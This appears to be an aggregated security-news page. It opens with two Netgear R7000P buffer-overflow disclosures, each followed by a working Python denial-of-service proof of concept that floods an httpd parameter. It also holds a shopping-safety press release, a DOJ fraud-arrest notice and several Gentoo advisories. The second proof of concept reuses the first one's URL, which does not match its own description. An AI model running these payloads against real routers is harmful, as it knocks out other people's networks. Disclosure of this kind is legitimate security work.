Netgear R7000P V1.3.1.64 is vulnerable to Buffer Overflow via parameters KEY1 and KEY2.

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_5835C function, which can be accessed via the URL http://routerlogin.net/WLG_wireless_dual_band_r10.htm.

This function accepts the POST parameter KEY1 without verifying its length, and copies an unbounded stack with strcpy which will result in a stack overflow. This vulnerability allows an attacker to cause denial of service (DoS).

It also happened in parameter KEY2.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'KEY1=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44191: IoT_vuln/Netgear/R7000P/8 at main · RobinWang825/IoT_vuln

Netgear R7000P V1.3.0.8, V1.3.1.64 is vulnerable to Buffer Overflow via parameters: stamode_dns1_pri and stamode_dns1_sec.

**Netgear R7000P has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.netgear.com
2.  firmware download: http://www.downloads.netgear.com/files/GDC/R7000P/R7000P-V1.3.0.8\_1.0.93.zip

http://www.downloads.netgear.com/files/GDC/R7000P/R7000P-V1.3.1.64\_10.1.36.zip

**Affected version**

V1.3.0.8, V1.3.1.64

**Vulnerability**

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_62A2C function, which can be accessed via the URL http://routerlogin.net/DIG_reboot_wireless.htm.

In this function, stamode_dns1_pri is controllable and will be passed into the v109 variable and v109 will be passed into stack s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

Also, stamode_dns1_sec is controllable and will be passed into the v108 variable and v108 will be passed into stack s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'stamode\_dns1\_pri=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44200: IoT_vuln/Netgear/R7000P/17 at main · RobinWang825/IoT_vuln

Safe shopping guidance coupled with new CISO tool to help safeguard personal data and corporate networks.

SANTA CLARA, Calif., November 21, 2022 — CybeReady, provider of the world’s fastest security awareness solution, today announced five easy security tips to help holiday shoppers safely navigate Black Friday and Cyber Monday as holiday sales put employee data and corporate networks at risk. Coinciding with Black Friday, the company is also releasing its enhanced CISO Toolkit to provide complimentary tools with guidance on safe online shopping to help CISOs defend employee desktops, laptops, mobile devices, and connected corporate networks.

According to the FBI, “Every year, thousands of people become victims of holiday scams. Scammers can rob you of hard-earned money, personal information, and, at the very least, a festive mood.”

Shopping scams are notoriously active during Black Friday and Cyber Monday as millions of shoppers use their PC, laptop, or mobile device to scan for deals and make purchases. This presents a considerable risk to organizations with a large number of employees working remotely. These scams often focus on obtaining the victim’s financial information with methods that include phishing scams, advertising lures, push notification lures, and payment traps.

Black Friday and Cyber Monday phishing emails tend to showcase amazing deals. Oftentimes these offers use emotional tactics to lure consumers into clicking offers that don’t really exist. Consumers expect deals, so phishing emails on Black Friday focus on deals more than any other type of scam. Advertising lures entice the user to enter a fake website and provide credit card information. Payment traps force the user to submit their credit card information rather than using a digital wallet or payment service, allowing the capture of this sensitive payment information. Other factors weaken the buyer’s judgment, making the situation even more dangerous as limited-time deals make it difficult to dig into the details, and unknown senders frequently text and email the buyer, adding to the distraction.

So, when this unique shopping season arrives, it is critical to be hyper-aware of the increasing risks to personal finances and employer networks. In response, CybeReady is offering the following guidelines to help reduce the chance of a scam or other sinister attack achieving success:

**Before Shopping**:

1.  Always enter the URL for a merchant’s website yourself. Do not use a link from an ad or email. Use the brand’s official shopping application on your smartphone.

**While Shopping**:

1.  Check for the lock symbol next to a website’s URL to ensure it is a secure site.
2.  Use a third-party payment method that does not transmit credit card information to the seller (like PayPal or Venmo), or use a disposable card.

**After Shopping**:

1.  Visit the merchant’s website to see sales updates. Do not click links in emails or texts claiming to provide order updates.
2.  Keep an eye on your financial account for any unanticipated transactions.

Because some employees will inevitably use their corporate connected PCs, laptops and mobile devices to take advantage of short-term shopping specials, CISOs are also advised to implement additional safeguards during this time period. To assist security leaders, CybeReady is releasing its enhanced CISO Toolkit for the holidays, which provides complimentary tools to help communicate relevant security information to employees – quickly and effectively. Download the free CISO Toolkit here.

The enhanced toolkit provides an overview of security guidelines, policies and tips, offering easy-to-understand information to help avoid cybersecurity traps with guidance on:

1.  Holiday Shopping Security
2.  Zoom Security
3.  Online Privacy
4.  Password Security
5.  Fake News and Rumors
6.  Remote Work
7.  COVID-19-related Phishing Emails
8.  Security in Times of Crisis
9.  Sextortion - what employees need to know
10.  Tips for Worry-Free Vacations

“It is important to realize how good deals for employees can become a bad ordeal for your organization,” said CyberReady CEO, Eitan Fogel. “During the Holiday Season employees may be easily distracted and hackers are very aware of this, resulting in a significant increase in cyberattacks as the holidays approach. In response, it must be an all-hands effort to ensure security is a top priority.”

**Resources****:**  

CybeReady Case Studies - https://cybeready.com/resource-center/case-studies

CybeReady White Papers - https://cybeready.com/resource-center/white-papers

The Ultimate Guide of Security Awareness Training - https://cybeready.com/complete-guide-cyber-awareness

**About CybeReady**  
CybeReady offers the world’s fastest security training platform, that evolves your organization from security awareness to cyber readiness. CybeReady’s solution autonomously engages more employees, more effectively, frequently, and easily. Infused with training expertise and powered by machine learning, CybeReady’s adaptive, easy-to-digest security training content program guarantees to reduce your high-risk employee group by 80%. CybeReady’s fully-managed solution has been deployed by hundreds of enterprises worldwide, including the City & County of San Francisco, SodaStream, ING, StitchFix, Teva Pharmaceuticals, Avid Technology, and others, CybeReady is fully-managed, making it the security awareness training solution with the lowest total cost of ownership (TCO) available today. Founded in 2015, CybeReady is headquartered in Tel Aviv, Israel, with offices in the Silicon Valley. For more information, please visit www.cybeready.com.

CybeReady Releases Five Easy Tips to Shop Safely During Black Friday

**US DEPARTMENT OF JUSTICE, NOV. 21 —** Two Estonian citizens were arrested in Tallinn, Estonia, yesterday on an 18-count indictment for their alleged involvement in a $575 million cryptocurrency fraud and money laundering conspiracy.

The indictment was returned by a grand jury in the Western District of Washington on Oct. 27 and unsealed today.

According to court documents, Sergei Potapenko and Ivan Turõgin, both 37, allegedly defrauded hundreds of thousands of victims through a multi-faceted scheme. They induced victims to enter into fraudulent equipment rental contracts with the defendants’ cryptocurrency mining service called HashFlare. They also caused victims to invest in a virtual currency bank called Polybius Bank. In reality, Polybius was never actually a bank, and never paid out the promised dividends. Victims paid more than $575 million to Potapenko and Turõgin’s companies. Potapenko and Turõgin then used shell companies to launder the fraud proceeds and to purchase real estate and luxury cars.

“New technology has made it easier for bad actors to take advantage of innocent victims – both in the U.S. and abroad – in increasingly complex scams,” said Assistant Attorney General Kenneth A. Polite, Jr. of the Justice Department’s Criminal Division. “The department is committed to preventing the public from losing more of their hard-earned money to these scams and will not allow these defendants, or others like them, to keep the fruits of their crimes.”

“The size and scope of the alleged scheme is truly astounding. These defendants capitalized on both the allure of cryptocurrency, and the mystery surrounding cryptocurrency mining, to commit an enormous Ponzi scheme,” said U.S. Attorney Nick Brown for the Western District of Washington. “They lured investors with false representations and then paid early investors off with money from those who invested later. They tried to hide their ill-gotten gain in Estonian properties, luxury cars, and bank accounts and virtual currency wallets around the world. U.S. and Estonian authorities are working to seize and restrain these assets and take the profit out of these crimes.”

"The FBI is committed to pursuing subjects across international boundaries who are utilizing increasingly complex schemes to defraud investors,” said Assistant Director Luis Quesada of the FBI’s Criminal Investigative Division. “Victims in the U.S. and abroad invested into what they believed were sophisticated virtual asset ventures, but it was all part of a fraudulent scheme and thousands of victims were harmed as a result. The FBI thanks our national and international partners for their efforts throughout the investigation to help bring justice for the victims.”

According to the indictment, Potapenko and Turõgin claimed that HashFlare was a massive cryptocurrency mining operation. Cryptocurrency mining is the process of using computers to generate cryptocurrency, such as Bitcoin, for profit. Potapenk and Turõgin offered contracts which, for a fee, purported to allow customers to rent a percentage of HashFlare’s mining operations in exchange for the virtual currency produced by their portion of the operation. HashFlare’s website enabled customers to see the amount of virtual currency their mining activity had supposedly generated. Customers from around the world, including western Washington, entered into more than $550 million worth of HashFlare contracts between 2015 and 2019.

According to the indictment, these contracts were fraudulent. HashFlare allegedly did not have the virtual currency mining equipment it claimed to have. HashFlare’s equipment allegedly performed Bitcoin mining at a rate of less than one percent of the computing power it purported to have. When investors asked to withdraw their mining proceeds, Potapenko and Turõgin were not able to pay the mined currency as promised. Instead, they either resisted making the payments, or paid off the investors using virtual currency the defendants had purchased on the open market—not currency they had mined. HashFlare closed its operations in 2019.

In May 2017, Potapenko and Turõgin offered investments in a company called Polybius, which they promised would form a bank specializing in virtual currency. They promised to pay investors dividends from Polybius’s profits. The men raised at least $25 million in this scheme and transferred most of the money to other bank accounts and virtual currency wallets they controlled. Polybius never formed a bank or paid any dividends.

The indictment also charges Potapenko and Turõgin with conspiring to launder their criminal proceeds by using shell companies and phony contracts and invoices. The money laundering conspiracy allegedly involved at least 75 real properties, six luxury vehicles, cryptocurrency wallets, and thousands of cryptocurrency mining machines.

Potapenko and Turõgin are both charged with conspiracy to commit wire fraud, 16 counts of wire fraud, and one count of conspiracy to commit money laundering. If convicted, Potapenko and Turõgin each face a maximum penalty of 20 years in prison. A federal district court judge will determine any sentence after considering the U.S. Sentencing Guidelines and other statutory factors.

The FBI is investigating the case.

The United States thanks the Cybercrime Bureau of the National Criminal Police of the Estonian Police and Border Guard for its support with this investigation. The U.S. Department of Justice’s Office of International Affairs provided extensive assistance to the investigation.

This investigation and today’s arrest demonstrate the great coordination and cooperation between U.S. and Estonian law enforcement. Estonia has been a crucial ally to disrupt this cyber-enabled crime, and the United States thanks the Estonians for their continued assistance and coordination.

Trial Attorneys Adrienne E. Rosen and Olivia Zhu of the Criminal Division’s Money Laundering and Asset Recovery Section and Assistant U.S. Attorneys Seth Wilkinson and Jehiel I. Baer for the Western District of Washington are prosecuting the case.

Individuals who believe they may have been a victim in this case should visit www.fbi.gov/hashflare for more information.

_An indictment is merely an allegation. All defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law._

Two Estonian Citizens Arrested in $575 Million Cryptocurrency Fraud and Money Laundering Scheme

Gentoo Linux Security Advisory 202211-7 - An integer overflow vulnerability has been found in sysstat which could result in arbitrary code execution. Versions less than 12.7.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: sysstat: Arbitrary Code Execution  
     Date: November 22, 2022  
     Bugs: #880543  
       ID: 202211-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
An integer overflow vulnerability has been found in sysstat which could  
result in arbitrary code execution.

Background  
=========  
sysstat is a package containing a number of performance monitoring  
utilities for Linux, including sar, mpstat, iostat and sa tools.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-admin/sysstat          < 12.7.1                    >= 12.7.1

Description  
==========  
On 32 bit systems, an integer overflow can be triggered when displaying  
activity data files.

Impact  
=====  
Arbitrary code execution can be achieved via sufficiently crafted  
malicious input.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All sysstat users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/sysstat-12.7.1"

References  
=========  
[ 1 ] CVE-2022-39377  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39377

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202211-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-07

Gentoo Linux Security Advisory 202211-6 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions less than 102.5.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: November 22, 2022  
     Bugs: #881403  
       ID: 202211-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could result in arbitrary code execution.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/firefox         < 102.5.0:esr          >= 102.5.0:esr  
                                < 107.0:rapid          >= 107.0:rapid  
  2  www-client/firefox-bin     < 102.5.0:esr          >= 102.5.0:esr  
                                < 107.0:rapid          >= 107.0:rapid

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-102.5.0"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-102.5.0"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-107.0"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-107.0"

References  
=========  
[ 1 ] CVE-2022-40674  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40674  
[ 2 ] CVE-2022-45403  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45403  
[ 3 ] CVE-2022-45404  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45404  
[ 4 ] CVE-2022-45405  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45405  
[ 5 ] CVE-2022-45406  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45406  
[ 6 ] CVE-2022-45407  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45407  
[ 7 ] CVE-2022-45408  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45408  
[ 8 ] CVE-2022-45409  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45409  
[ 9 ] CVE-2022-45410  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45410  
[ 10 ] CVE-2022-45411  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45411  
[ 11 ] CVE-2022-45412  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45412  
[ 12 ] CVE-2022-45413  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45413  
[ 13 ] CVE-2022-45415  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45415  
[ 14 ] CVE-2022-45416  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45416  
[ 15 ] CVE-2022-45417  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45417  
[ 16 ] CVE-2022-45418  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45418  
[ 17 ] CVE-2022-45419  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45419  
[ 18 ] CVE-2022-45420  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45420  
[ 19 ] CVE-2022-45421  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45421

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202211-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-06

Gentoo Linux Security Advisory 202211-5 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could result in arbitrary code execution. Versions less than 102.5.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: November 22, 2022  
     Bugs: #881407  
       ID: 202211-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Mozilla Thunderbird,  
the worst of which could result in arbitrary code execution.

Background  
=========  
Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  mail-client/thunderbird    < 102.5.0                  >= 102.5.0  
  2  mail-client/thunderbird-bin  < 102.5.0                >= 102.5.0

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Thunderbird binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-102.5.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-102.5.0"

References  
=========  
[ 1 ] CVE-2022-45403  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45403  
[ 2 ] CVE-2022-45404  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45404  
[ 3 ] CVE-2022-45405  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45405  
[ 4 ] CVE-2022-45406  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45406  
[ 5 ] CVE-2022-45408  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45408  
[ 6 ] CVE-2022-45409  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45409  
[ 7 ] CVE-2022-45410  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45410  
[ 8 ] CVE-2022-45411  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45411  
[ 9 ] CVE-2022-45412  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45412  
[ 10 ] CVE-2022-45416  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45416  
[ 11 ] CVE-2022-45418  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45418  
[ 12 ] CVE-2022-45420  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45420  
[ 13 ] CVE-2022-45421  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45421

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202211-05

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-05

Gentoo Linux Security Advisory 202211-8 - A vulnerability has been discovered in sudo which could result in denial of service. Versions less than 1.9.12-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: sudo: Heap-Based Buffer Overread  
     Date: November 22, 2022  
     Bugs: #879209  
       ID: 202211-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in sudo which could result in denial  
of service.

Background  
=========  
sudo allows a system administrator to give users the ability to run  
commands as other users.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-admin/sudo             < 1.9.12-r1              >= 1.9.12-r1

Description  
==========  
In certain password input handling, sudo incorrectly assumes the  
password input is at least nine bytes in size, leading to a heap buffer  
overread.

Impact  
=====  
In the worst case, the heap buffer overread can result in the denial of  
service of the sudo process.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All sudo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.9.12-r1"

References  
=========  
[ 1 ] CVE-2022-43995  
      https://nvd.nist.gov/vuln/detail/CVE-2022-43995

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202211-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-08

Gentoo Linux Security Advisory 202211-11 - Multiple vulnerabilities have been found in GPL Ghostscript, the worst of which could result in arbitrary code execution. Versions less than 9.56.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GPL Ghostscript: Multiple Vulnerabilities  
     Date: November 22, 2022  
     Bugs: #852944, #812509  
       ID: 202211-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in GPL Ghostscript, the worst  
of which could result in arbitrary code execution.

Background  
=========  
Ghostscript is an interpreter for the PostScript language and for PDF.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-text/ghostscript-gpl   < 9.56.1                    >= 9.56.1

Description  
==========  
Multiple vulnerabilities have been discovered in GPL Ghostscript. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All GPL Ghostscript users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/ghostscript-gpl-9.56.1"

References  
=========  
[ 1 ] CVE-2021-3781  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3781  
[ 2 ] CVE-2022-2085  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2085

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202211-11

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-11

Gentoo Linux Security Advisory 202211-9 - A vulnerability has been found in xterm which could allow for arbitrary code execution. Versions less than 375 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: xterm: Arbitrary Code Execution  
     Date: November 22, 2022  
     Bugs: #880747  
       ID: 202211-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in xterm which could allow for arbitrary  
code execution.

Background  
=========  
xterm is a terminal emulator for the X Window system.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  x11-terms/xterm            < 375                          >= 375

Description  
==========  
xterm does not correctly handle control characters related to OSC 50  
font ops sequence handling.

Impact  
=====  
The vulnerability allows text written to the terminal to write text to  
the terminal's command line. If the terminal's shell is zsh running with  
vi line editing mode, text written to the terminal can also trigger the  
execution of arbitrary commands via writing ^G to the terminal.

Workaround  
=========  
As a workaround, users can disable xterm's usage of OSC 50 sequences by  
adding the following to the XResources configuration:

XTerm*allowFontOps: false

Resolution  
=========  
All xterm users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-terms/xterm-375"

References  
=========  
[ 1 ] CVE-2022-45063  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45063

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202211-09

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#mac